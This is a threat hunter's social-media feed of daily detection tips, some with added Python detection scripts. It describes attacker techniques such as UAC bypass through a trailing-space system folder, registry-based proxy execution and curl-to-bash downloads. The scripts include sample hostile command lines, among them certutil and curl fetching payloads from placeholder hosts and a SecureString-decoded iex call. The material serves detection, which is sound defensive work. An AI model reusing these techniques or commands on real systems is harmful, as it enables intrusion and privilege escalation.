Wietze
@wietzebeukema.nl
170 followers 59 following 34 posts
Threat Detection & Response. Interested in cyber security, tech and politics. Views are my own, unless retweeted.
Reposted by Wietze
johnhammond.bsky.social
Video demo to play with ArgFuscator -- the super cool research and utility from @Wietze to obfuscate command-lines to try and evade AV or EDR detection 😎 And to test your rules if any of these crazy looking commands fly under the radar! youtu.be/6-Gbv0h7m1I
wietzebeukema.nl
As June comes to an end, so does #HuntingTipOfTheDay. I hope you enjoyed them!

👉 Find all of them here: bsky.app/search?q=fro...
wietzebeukema.nl
#HuntingTipOfTheDay: you know how to spot/decode Base64 or XOR in PowerShell… but what about SecureString? This AES-based encryption is native to PowerShell; attackers have been seen to use this for PowerShell obfuscation.

🔍 Hunt for known SecureString decoding commands
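Added example, not code from the post: a small Python scanner over constructed PowerShell command lines that flags the cmdlet and .NET marshal names usually chained to turn a keyed SecureString blob back into plaintext. The pattern list, the pairing rule and the sample lines are assumptions for this illustration; tune them against your own telemetry.

```python
import re

# PowerShell cmdlets / .NET marshal calls that turn a SecureString back into a plain string.
# Constructed list for this example; extend it with what your own telemetry shows.
DECODE_PATTERNS = {
    "keyed-rehydrate": r"ConvertTo-SecureString\b[^|;]*-K(?:ey)?\b",
    "to-bstr":         r"SecureStringTo(?:BSTR|GlobalAllocUnicode|CoTaskMemUnicode)",
    "ptr-to-string":   r"PtrToString(?:Auto|Uni|BSTR)",
    "netcred":         r"GetNetworkCredential\(\)\.Password",
}
_COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in DECODE_PATTERNS.items()}

def securestring_hits(cmdline: str) -> list[str]:
    """Names of the decode patterns present in one PowerShell command line."""
    return [name for name, rx in _COMPILED.items() if rx.search(cmdline)]

def is_securestring_obfuscation(cmdline: str) -> bool:
    """True when a keyed blob is rehydrated AND marshalled back to plaintext in one line.
    Either half alone is common in legitimate credential handling; the pair is the chain."""
    hits = set(securestring_hits(cmdline))
    return "keyed-rehydrate" in hits and bool(hits - {"keyed-rehydrate"})

def scan(cmdlines):
    """Return (cmdline, hits) for every line that looks like SecureString obfuscation."""
    return [(c, securestring_hits(c)) for c in cmdlines if is_securestring_obfuscation(c)]

# Constructed sample command lines (not real telemetry); <AES-BLOB> stands in for the ciphertext
SAMPLE_CMDLINES = [
    "powershell -nop -c \"$k=(1..16);$s=ConvertTo-SecureString '<AES-BLOB>' -Key $k;"
    "iex([Runtime.InteropServices.Marshal]::PtrToStringAuto("
    "[Runtime.InteropServices.Marshal]::SecureStringToBSTR($s)))\"",
    "powershell -c \"$c=Get-Credential; $c | Export-Clixml C:\\temp\\cred.xml\"",
    "powershell -c \"$p=Read-Host -AsSecureString; New-Object PSCredential('svc',$p)\"",
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES):
        print(hits, cmd[:80])
```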
wietzebeukema.nl
#HuntingTipOfTheDay: Stuck in vi/vim? Open a reverse shell to exit remotely 🙃

Not just a joke - you can make vi/vim run arbitrary commands, not all methods to do so are well detected.
🔍 Hunt for child processes of vi(m), especially those that are rare in your environment.
wietzebeukema.nl
#HuntingTipOfTheDay: there are numerous open-source projects listing cyber threats. Some of these have directly ingestible indicators, which can be very helpful when threat hunting. How about:
🔵 lots-project.com + LOLBINs
🟠 hijacklibs.net + DLL write events
🟢 lolrmm.io + DNS requests
wietzebeukema.nl
#HuntingTipOfTheDay: AppleScript via osascript is still a popular way for infostealers to get credentials/escalate access. Although some (poorly coded) updaters use this "legitimately", hunting for osascript referencing password dialogs might surface behaviour of interest.
wietzebeukema.nl
#HuntingTipOfTheDay: USB worms are still a thing - often the initial infection happens when a user clicks a malicious shortcut on a USB device. See if you can correlate executions with .LNK files on remote drives to find possible badness.
wietzebeukema.nl
#HuntingTipOfTheDay: proxy execution via ComputerDefaults.exe by setting this registry key; as it auto-elevates, it also allows for UAC bypass (!).
🔴 Executing parent is usually explorer.exe, making detection harder
🔍 Hunt for reg changes to this key
👉 lolbas-project.github.io/lolbas/Binar...
wietzebeukema.nl
#HuntingTipOfTheDay: Florian is right.
🌩️ Cloud creds often linger in Environment Variables, especially on servers/dev machines
🟠 One compromised endpoint could thus lead to a full cloud breach
🔍 Hunt for exposed tokens - if you can see it, so could an attacker (well, kinda)
wietzebeukema.nl
#HuntingTipOfTheDay: Oddvar Moe of @trustedsec.com shows how you can run a full C2 implant from Outlook - just setting a few registry keys does the trick.

Any activity concerning these registry keys should be considered suspicious.

Full story here: youtu.be/7MDHhavM5GM
wietzebeukema.nl
#HuntingTipOfTheDay: TCC on macOS can be bypassed by triggering Electron apps' Node.js interface to run arbitrary commands
⚡ By using a Launch Daemon, you can leverage all the app's TCC permissions
🔍 Hunt for processes with ELECTRON_RUN_AS_NODE env var and unusual command lines
wietzebeukema.nl
#ThreatHuntingTipOfTheDay: rundll32 can be abused in many ways lolbas-project.github.io#t1218.011

Instead of exports, ordinals can be used too. You could hunt for known bad ones, but are ordinals used legitimately that often at all?

Look for rundll32 with # on the command line to find out
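Added example, not code from the post or the LOLBAS project: a Python parser that splits rundll32 command lines into DLL, entry point and arguments and flags entry points written as #ordinal, so the ordinal calls can be baselined separately. The grammar is a deliberate simplification of rundll32's real (more permissive) parsing, and the sample command lines are constructed.

```python
import re

# Simplified grammar for 'rundll32[.exe] <dll>,<entrypoint> [args]'. rundll32's real
# parser is more permissive (quoting, spacing), so treat misses as "inspect manually".
_RUNDLL32 = re.compile(
    r'^\s*"?(?:\S*[\\/])?rundll32(?:\.exe)?"?\s+'
    r'(?:"(?P<qdll>[^"]+)"|(?P<dll>[^\s,]+))\s*,\s*(?P<entry>\S+)(?:\s+(?P<args>.*))?$',
    re.IGNORECASE,
)

def parse_rundll32(cmdline: str):
    """Return {'dll', 'entry', 'args', 'ordinal'} for a rundll32 command line, or None."""
    m = _RUNDLL32.match(cmdline)
    if not m:
        return None
    entry = m.group("entry")
    return {
        "dll": m.group("qdll") or m.group("dll"),
        "entry": entry,
        "args": m.group("args") or "",
        # An entry point written as #<number> is an export ordinal, not an export name
        "ordinal": entry.startswith("#"),
    }

def ordinal_calls(cmdlines):
    """Keep only command lines that call an export by ordinal; these are the ones to baseline."""
    out = []
    for c in cmdlines:
        p = parse_rundll32(c)
        if p and p["ordinal"]:
            out.append((c, p["dll"], p["entry"]))
    return out

# Constructed sample command lines (not real telemetry)
SAMPLE = [
    r'rundll32.exe shell32.dll,Control_RunDLL hotplug.dll',
    r'C:\Windows\System32\rundll32.exe "C:\Users\Public\p.dll",#1',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Public\p.dll, #-2 /silent',
    r'notepad.exe C:\Users\Public\notes.txt',
]

if __name__ == "__main__":
    for cmd, dll, entry in ordinal_calls(SAMPLE):
        print(f"ordinal {entry} in {dll}: {cmd}")
```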
wietzebeukema.nl
UAC bypass can be achieved by eg moving the legit perfmon.exe and a malicious atl.dll to "c:\windows \system32". Windows is tricked into thinking this is a safe/trusted directory, meaning perfmon will launch with high integrity and your DLL will be loaded. Several other executables are vulnerable!
wietzebeukema.nl
#HuntingTipOfTheDay: folders with trailing spaces can be created on Windows, and they cause trouble:
🔴 Hard to delete/rename
🟠 Can hide (malicious) content when the same folder without trailing space exists
🟡 May enable UAC bypass (see next msg)

🔍 Hunt for paths with trailing spaces - highly sus
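Added example, not code from either post: a Python check that flags path components ending in a space and, for the perfmon.exe/atl.dll trick described in the post above, tests whether stripping that space would land the file in a trusted system directory. The trusted-directory set and the sample paths are assumptions for this illustration.

```python
import ntpath

# Directories whose contents auto-elevation treats as trusted (assumption for this example,
# taken from the "c:\windows \system32" trick described in the post).
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def trailing_space_components(path: str) -> list[str]:
    """Path components ending in a space. Normal Win32 file calls strip trailing spaces,
    so such names only exist when created through the extended-length path prefix."""
    return [c for c in path.split("\\") if c and c != c.rstrip(" ")]

def normalise(path: str) -> str:
    """Collapse each component the way a naive trusted-path string comparison sees it."""
    return "\\".join(c.rstrip(" ") for c in path.split("\\"))

def assess_path(path: str) -> dict:
    """Flag trailing-space components and whether the path masquerades as a trusted dir."""
    comps = trailing_space_components(path)
    collapsed = normalise(path)
    parent = ntpath.dirname(collapsed).lower()
    return {
        "path": path,
        "trailing_space_components": comps,
        "collapsed": collapsed,
        # A spoof only when the trailing space is all that separates it from a trusted dir
        "mimics_trusted_dir": bool(comps) and parent in TRUSTED_DIRS
                              and ntpath.dirname(path).lower() not in TRUSTED_DIRS,
    }

def hunt(paths):
    """Findings for every path with at least one trailing-space component."""
    return [f for f in map(assess_path, paths) if f["trailing_space_components"]]

# Constructed sample image / module paths (not real telemetry)
SAMPLE_PATHS = [
    r"C:\Windows\System32\perfmon.exe",
    r"C:\Windows \System32\perfmon.exe",
    r"C:\Windows \System32\atl.dll",
    r"C:\Users\bob\tools \loader.exe",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_PATHS):
        print(f["path"], "-> trusted-dir spoof" if f["mimics_trusted_dir"] else "-> trailing space")
```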
wietzebeukema.nl
Bonus background reading: why do hidden files start with a dot on Linux?

💠 glenda.0x46.net/articles/dot...
A lesson in shortcuts - Rob Pike
glenda.0x46.net
wietzebeukema.nl
#HuntingTipOfTheDay: you’ll know that in Linux, files with a leading dot are hidden by default. Attackers may use this to hide payloads or frustrate forensics. Although sometimes used legitimately, you may find unexpected entries when looking for EXECUTIONS of hidden files.
wietzebeukema.nl
#HuntingTipOfTheDay: a personal favourite, command-line obfuscation. Substituting or inserting special Unicode characters might allow attackers to bypass string-based detections. Look for command lines with unusual Unicode characters. Check out ArgFuscator.net for more fun!
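Added example, not code from the post or from ArgFuscator: a Python triage helper that classifies the non-ASCII characters in a command line (invisible/combining, ASCII lookalikes, dash and space variants) and folds the line back to plain ASCII so existing string-based rules can be re-run against it. The category heuristics and the sample lines are assumptions for this illustration.

```python
import unicodedata

# Categories that almost never belong in a benign command line: format/control characters
# (zero-width space, RTL override) and combining marks glued onto ordinary letters.
_INVISIBLE = {"Cf", "Cc", "Mn", "Me"}

def classify_char(ch: str):
    """Reason string when a non-ASCII character looks like obfuscation, else None."""
    if ch.isascii():
        return None
    cat = unicodedata.category(ch)
    folded = unicodedata.normalize("NFKC", ch)
    if cat in _INVISIBLE:
        return "invisible-or-combining"
    if folded != ch and folded.isascii():
        return f"lookalike-for:{folded}"   # fullwidth letters/digits and other compatibility forms
    if cat == "Pd":
        return "dash-variant"              # en/em dash sitting where an option prefix is expected
    if cat == "Zs":
        return "space-variant"             # non-breaking or ideographic space as a separator
    return None                            # accented names, CJK text etc. are ordinary

def unicode_findings(cmdline: str):
    """(offset, codepoint, name, reason) for every suspicious non-ASCII character."""
    out = []
    for i, ch in enumerate(cmdline):
        reason = classify_char(ch)
        if reason:
            out.append((i, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNNAMED"), reason))
    return out

def fold_cmdline(cmdline: str) -> str:
    """Fold lookalikes to ASCII and drop invisibles so string-based rules match again."""
    out = []
    for ch in unicodedata.normalize("NFKC", cmdline):
        cat = unicodedata.category(ch)
        if cat in _INVISIBLE:
            continue
        if not ch.isascii() and cat == "Pd":
            ch = "-"
        elif not ch.isascii() and cat == "Zs":
            ch = " "
        out.append(ch)
    return "".join(out)

# Constructed samples (not real telemetry)
SAMPLE = [
    "reg add HKCU\\Software\\Example /v Run /d C:\\x.exe",          # plain ASCII
    "\uff52\uff45\uff47 add HKCU\\Software\\Example /v Run",          # fullwidth 'reg'
    "certutil \u2013urlcache \u2013f http://example.invalid/a.exe",   # en dashes as option prefix
    "cmd /c ping\u200b example.invalid",                               # zero-width space inserted
    "type C:\\Users\\Jos\u00e9\\notes.txt",                            # benign accented path
]
```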
wietzebeukema.nl
#HuntingTipOfTheDay: macOS has a built-in SSH mechanism that is disabled by default. Would you detect it if someone enables it and logs in remotely? Look for remote login events, and investigate the associated session.
wietzebeukema.nl
#HuntingTipOfTheDay: Services can provide persistence. Looking for changes to their commands is common, but the lesser known Environment setting is often overlooked. It could result in stealthy DLL hijacking. Inspect any paths referenced for suspicious files.
wietzebeukema.nl
#HuntingTipOfTheDay: explorer.exe /root,"c:/your/executable.exe" will spawn your exe from the main explorer.exe, not a new one. This breaks normal process chains. Hunt for explorer.exe with "/root", as well as explorer spawning unusual children (e.g. rundll32, mshta, powershell).
wietzebeukema.nl
#HuntingTipOfTheDay: a common way to execute malicious code on Linux is to download a script via curl/wget and pipe the result into a shell process like bash. Hunt for curl/wget executions followed by an interactive shell within seconds, both having the same parent process.
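Added example, not code from the post: Python correlation logic that pairs a curl/wget execution with a sibling shell (same parent) that has no script argument, so it is reading its commands from the pipe, when both start within a few seconds of each other. The event schema, the time window and the sample events are assumptions for this illustration.

```python
import os
from datetime import datetime

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}

def reads_stdin(cmdline: str) -> bool:
    """A shell with no script path (and no -c command) on its command line reads stdin: the pipe."""
    return all(t.startswith("-") for t in cmdline.split()[1:])

def _ts(event) -> datetime:
    return datetime.fromisoformat(event["ts"])

def find_pipe_to_shell(events, window_s: int = 5):
    """Pair each curl/wget exec with a stdin-reading shell that shares its parent and started
    within window_s seconds, in either order: the parent forks both sides of the pipe at once."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e["ppid"], []).append(e)
    pairs = []
    for siblings in by_parent.values():
        downloads = [e for e in siblings if os.path.basename(e["image"]) in DOWNLOADERS]
        shells = [e for e in siblings
                  if os.path.basename(e["image"]) in SHELLS and reads_stdin(e["cmdline"])]
        for d in downloads:
            for s in shells:
                delta = abs((_ts(s) - _ts(d)).total_seconds())
                if delta <= window_s:
                    pairs.append((d["pid"], s["pid"], delta))
    return pairs

# Constructed process-start events (not real telemetry): ts, pid, ppid, image, cmdline
SAMPLE_EVENTS = [
    {"ts": "2024-06-01T10:00:00", "pid": 1200, "ppid": 1000, "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL http://example.invalid/x.sh"},
    {"ts": "2024-06-01T10:00:00", "pid": 1201, "ppid": 1000, "image": "/bin/bash", "cmdline": "bash"},
    {"ts": "2024-06-01T10:05:00", "pid": 1300, "ppid": 2000, "image": "/usr/bin/wget",
     "cmdline": "wget https://example.invalid/pkg.tgz"},
    {"ts": "2024-06-01T10:05:03", "pid": 1301, "ppid": 2000, "image": "/bin/bash",
     "cmdline": "bash ./install.sh"},                       # script argument: not reading the pipe
    {"ts": "2024-06-01T10:10:00", "pid": 1400, "ppid": 3000, "image": "/usr/bin/curl",
     "cmdline": "curl -s https://example.invalid/api"},
    {"ts": "2024-06-01T10:10:30", "pid": 1401, "ppid": 3000, "image": "/bin/sh", "cmdline": "sh"},  # 30 s later
]

if __name__ == "__main__":
    for dl_pid, sh_pid, delta in find_pipe_to_shell(SAMPLE_EVENTS):
        print(f"downloader pid {dl_pid} piped into shell pid {sh_pid} ({delta:.0f}s apart)")
```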
wietzebeukema.nl
#HuntingTipOfTheDay: You have probably heard of .bash_profile and .zshrc, but are you familiar with PowerShell's version of it? Attackers might use this for persistence; monitor modifications of profiles by unexpected processes, and analyse existing files for anomalies.
wietzebeukema.nl
#ThreatHuntingTipOfTheDay: Malicious DMGs/PKGs are currently the most popular way for macOS infostealers to get foothold. Use macOS’s kMDItemWhereFroms extended attribute to see origins of downloaded DMG/PKGs; investigate ones that are rare across your IT estate.
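Added example, not code from the post: a Python helper that decodes the kMDItemWhereFroms attribute (a binary plist list of URLs) and ranks download domains by how many machines they were seen on, so the rare origins surface first. The record format, the host-count threshold and the sample inventory are assumptions for this illustration; read_wherefroms shells out to xattr and therefore only works on macOS.

```python
import plistlib
import subprocess
from collections import defaultdict
from urllib.parse import urlsplit

XATTR = "com.apple.metadata:kMDItemWhereFroms"

def decode_wherefroms(raw: bytes) -> list[str]:
    """The attribute is a binary plist holding a list of URLs: [download URL, referrer page]."""
    value = plistlib.loads(raw)
    return [str(u) for u in value] if isinstance(value, list) else []

def read_wherefroms(path: str) -> list[str]:
    """macOS only: `xattr -px` prints the raw attribute bytes as hex, which we decode."""
    out = subprocess.run(["xattr", "-px", XATTR, path], capture_output=True, text=True, check=True)
    return decode_wherefroms(bytes.fromhex(out.stdout))

def build_sample_attr(urls: list[str]) -> bytes:
    """Construct an attribute value in the same binary-plist shape, for offline testing."""
    return plistlib.dumps(urls, fmt=plistlib.FMT_BINARY)

def rare_origins(records, max_hosts: int = 2):
    """records: (hostname, filename, urls). Return (download domain, host count, files) for
    domains seen on at most max_hosts machines: the long tail, not the corporate mirror."""
    hosts_by_domain, files_by_domain = defaultdict(set), defaultdict(set)
    for host, filename, urls in records:
        if not urls:
            continue                                   # no origin recorded (not a browser download)
        domain = urlsplit(urls[0]).hostname or "?"     # first entry is the direct download URL
        hosts_by_domain[domain].add(host)
        files_by_domain[domain].add(filename)
    return sorted((d, len(h), sorted(files_by_domain[d]))
                  for d, h in hosts_by_domain.items() if len(h) <= max_hosts)

# Constructed inventory of (host, file, kMDItemWhereFroms) across an estate; not real telemetry
SAMPLE_RECORDS = [
    ("mac-001", "ChatApp.dmg", ["https://downloads.example-corp.invalid/ChatApp.dmg", "https://intranet.example-corp.invalid/"]),
    ("mac-002", "ChatApp.dmg", ["https://downloads.example-corp.invalid/ChatApp.dmg", "https://intranet.example-corp.invalid/"]),
    ("mac-003", "ChatApp.dmg", ["https://downloads.example-corp.invalid/ChatApp.dmg", ""]),
    ("mac-004", "Installer.dmg", ["https://cdn.free-tools.invalid/Installer.dmg", "https://free-tools.invalid/download"]),
    ("mac-005", "Setup.pkg", []),
]

if __name__ == "__main__":
    for domain, n_hosts, files in rare_origins(SAMPLE_RECORDS):
        print(f"{domain}: seen on {n_hosts} host(s), files {files}")
```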